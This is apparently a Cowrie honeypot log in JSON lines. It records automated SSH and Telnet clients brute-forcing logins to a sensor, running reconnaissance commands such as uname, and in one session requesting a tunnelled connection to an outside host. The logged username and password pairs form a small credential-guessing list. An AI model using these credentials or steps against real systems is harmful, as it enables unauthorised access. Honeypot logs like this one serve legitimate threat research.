{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T00:08:44.055030Z","src_ip":"212.227.125.160","session":"e86a26ddb96b"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T00:08:44.561553Z","src_ip":"212.227.125.160","session":"e86a26ddb96b"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:08:45.645147Z","src_ip":"212.227.125.160","session":"e86a26ddb96b"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":59208,"dst_ip":"1.2.3.4","dst_port":22,"session":"26d05e83b3d4","protocol":"ssh","message":"New connection: 194.233.79.134:59208 (1.2.3.4:22) [session: 26d05e83b3d4]","sensor":"my-vps","timestamp":"2025-08-28T00:09:12.315817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:09:12.316591Z","src_ip":"194.233.79.134","session":"26d05e83b3d4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:09:12.899122Z","src_ip":"194.233.79.134","session":"26d05e83b3d4"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2wsx","message":"login attempt [root/1qaz2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T00:09:13.838630Z","src_ip":"194.233.79.134","session":"26d05e83b3d4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T00:09:14.845541Z","src_ip":"194.233.79.134","session":"26d05e83b3d4"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T00:09:14.846220Z","src_ip":"194.233.79.134","session":"26d05e83b3d4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:09:15.359610Z","src_ip":"194.233.79.134","session":"26d05e83b3d4"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:09:15.360739Z","src_ip":"194.233.79.134","session":"26d05e83b3d4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62355,"dst_ip":"1.2.3.4","dst_port":22,"session":"57980e48ed81","protocol":"ssh","message":"New connection: 212.227.235.229:62355 (1.2.3.4:22) [session: 57980e48ed81]","sensor":"my-vps","timestamp":"2025-08-28T00:09:29.488472Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T00:09:29.489141Z","src_ip":"212.227.235.229","session":"57980e48ed81"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T00:09:29.649712Z","src_ip":"212.227.235.229","session":"57980e48ed81"}
{"eventid":"cowrie.login.failed","username":"user","password":"Exigent","message":"login attempt [user/Exigent] failed","sensor":"my-vps","timestamp":"2025-08-28T00:09:30.351695Z","src_ip":"212.227.235.229","session":"57980e48ed81"}
{"eventid":"cowrie.login.failed","username":"user","password":"clancy","message":"login attempt [user/clancy] failed","sensor":"my-vps","timestamp":"2025-08-28T00:09:31.485913Z","src_ip":"212.227.235.229","session":"57980e48ed81"}
{"eventid":"cowrie.login.failed","username":"user","password":"chelsea1","message":"login attempt [user/chelsea1] failed","sensor":"my-vps","timestamp":"2025-08-28T00:09:32.620321Z","src_ip":"212.227.235.229","session":"57980e48ed81"}
{"eventid":"cowrie.login.failed","username":"user","password":"353535","message":"login attempt [user/353535] failed","sensor":"my-vps","timestamp":"2025-08-28T00:09:33.755335Z","src_ip":"212.227.235.229","session":"57980e48ed81"}
{"eventid":"cowrie.login.failed","username":"user","password":"282828","message":"login attempt [user/282828] failed","sensor":"my-vps","timestamp":"2025-08-28T00:09:34.894877Z","src_ip":"212.227.235.229","session":"57980e48ed81"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:09:36.036707Z","src_ip":"212.227.235.229","session":"57980e48ed81"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":54120,"dst_ip":"1.2.3.4","dst_port":22,"session":"00afb3efc9a2","protocol":"ssh","message":"New connection: 194.233.79.134:54120 (1.2.3.4:22) [session: 00afb3efc9a2]","sensor":"my-vps","timestamp":"2025-08-28T00:10:50.403311Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:10:51.113866Z","src_ip":"194.233.79.134","session":"00afb3efc9a2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:10:51.117860Z","src_ip":"194.233.79.134","session":"00afb3efc9a2"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp123","message":"login attempt [uftp/uftp123] failed","sensor":"my-vps","timestamp":"2025-08-28T00:10:52.954859Z","src_ip":"194.233.79.134","session":"00afb3efc9a2"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:10:54.224017Z","src_ip":"194.233.79.134","session":"00afb3efc9a2"}
{"eventid":"cowrie.session.connect","src_ip":"66.175.213.4","src_port":22104,"dst_ip":"1.2.3.4","dst_port":22,"session":"61583ca7ad43","protocol":"ssh","message":"New connection: 66.175.213.4:22104 (1.2.3.4:22) [session: 61583ca7ad43]","sensor":"my-vps","timestamp":"2025-08-28T00:11:00.544955Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:11:00.798784Z","src_ip":"66.175.213.4","session":"61583ca7ad43"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T00:11:00.799448Z","src_ip":"66.175.213.4","session":"61583ca7ad43"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58895,"dst_ip":"1.2.3.4","dst_port":23,"session":"3c12536ba74b","protocol":"telnet","message":"New connection: 212.227.125.160:58895 (1.2.3.4:23) [session: 3c12536ba74b]","sensor":"my-vps","timestamp":"2025-08-28T00:11:00.826827Z"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:11:01.560208Z","src_ip":"66.175.213.4","session":"61583ca7ad43"}
{"eventid":"cowrie.session.connect","src_ip":"66.175.213.4","src_port":22112,"dst_ip":"1.2.3.4","dst_port":22,"session":"56f6a710afd5","protocol":"ssh","message":"New connection: 66.175.213.4:22112 (1.2.3.4:22) [session: 56f6a710afd5]","sensor":"my-vps","timestamp":"2025-08-28T00:11:01.662606Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:11:01.879240Z","src_ip":"66.175.213.4","session":"56f6a710afd5"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T00:11:01.881199Z","src_ip":"66.175.213.4","session":"56f6a710afd5"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:11:02.649024Z","src_ip":"66.175.213.4","session":"56f6a710afd5"}
{"eventid":"cowrie.session.connect","src_ip":"66.175.213.4","src_port":31884,"dst_ip":"1.2.3.4","dst_port":22,"session":"0506ff29f26d","protocol":"ssh","message":"New connection: 66.175.213.4:31884 (1.2.3.4:22) [session: 0506ff29f26d]","sensor":"my-vps","timestamp":"2025-08-28T00:11:02.762691Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:11:03.006761Z","src_ip":"66.175.213.4","session":"0506ff29f26d"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T00:11:03.007662Z","src_ip":"66.175.213.4","session":"0506ff29f26d"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:11:03.703401Z","src_ip":"66.175.213.4","session":"0506ff29f26d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":30126,"dst_ip":"1.2.3.4","dst_port":22,"session":"75be0d94a35b","protocol":"ssh","message":"New connection: 212.227.125.160:30126 (1.2.3.4:22) [session: 75be0d94a35b]","sensor":"my-vps","timestamp":"2025-08-28T00:11:05.898481Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:11:05.899638Z","src_ip":"212.227.125.160","session":"75be0d94a35b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":30410,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0614ca135d4","protocol":"ssh","message":"New connection: 212.227.125.160:30410 (1.2.3.4:22) [session: d0614ca135d4]","sensor":"my-vps","timestamp":"2025-08-28T00:11:06.012191Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:11:06.013028Z","src_ip":"212.227.125.160","session":"d0614ca135d4"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T00:11:06.128899Z","src_ip":"212.227.125.160","session":"d0614ca135d4"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T00:11:06.476434Z","src_ip":"212.227.125.160","session":"d0614ca135d4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T00:11:06.592566Z","session":"d0614ca135d4"}
{"eventid":"cowrie.session.closed","duration":30.9018292427063,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:11:31.728574Z","src_ip":"212.227.125.160","session":"3c12536ba74b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":7577,"dst_ip":"1.2.3.4","dst_port":22,"session":"596720aa829f","protocol":"ssh","message":"New connection: 212.227.235.229:7577 (1.2.3.4:22) [session: 596720aa829f]","sensor":"my-vps","timestamp":"2025-08-28T00:11:48.391993Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:11:48.838764Z","src_ip":"212.227.235.229","session":"596720aa829f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:11:48.839472Z","src_ip":"212.227.235.229","session":"596720aa829f"}
{"eventid":"cowrie.login.success","username":"root","password":"061159*321@","message":"login attempt [root/061159*321@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T00:11:51.666943Z","src_ip":"212.227.235.229","session":"596720aa829f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43910,"dst_ip":"1.2.3.4","dst_port":22,"session":"654eb19a999b","protocol":"ssh","message":"New connection: 212.227.235.229:43910 (1.2.3.4:22) [session: 654eb19a999b]","sensor":"my-vps","timestamp":"2025-08-28T00:11:52.499916Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T00:11:52.871518Z","src_ip":"212.227.235.229","session":"596720aa829f"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T00:11:52.872197Z","src_ip":"212.227.235.229","session":"596720aa829f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:11:52.894939Z","src_ip":"212.227.235.229","session":"654eb19a999b"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T00:11:52.895715Z","src_ip":"212.227.235.229","session":"654eb19a999b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:11:53.269929Z","src_ip":"212.227.235.229","session":"596720aa829f"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:11:53.389551Z","src_ip":"212.227.235.229","session":"596720aa829f"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:11:54.165284Z","src_ip":"212.227.235.229","session":"654eb19a999b"}
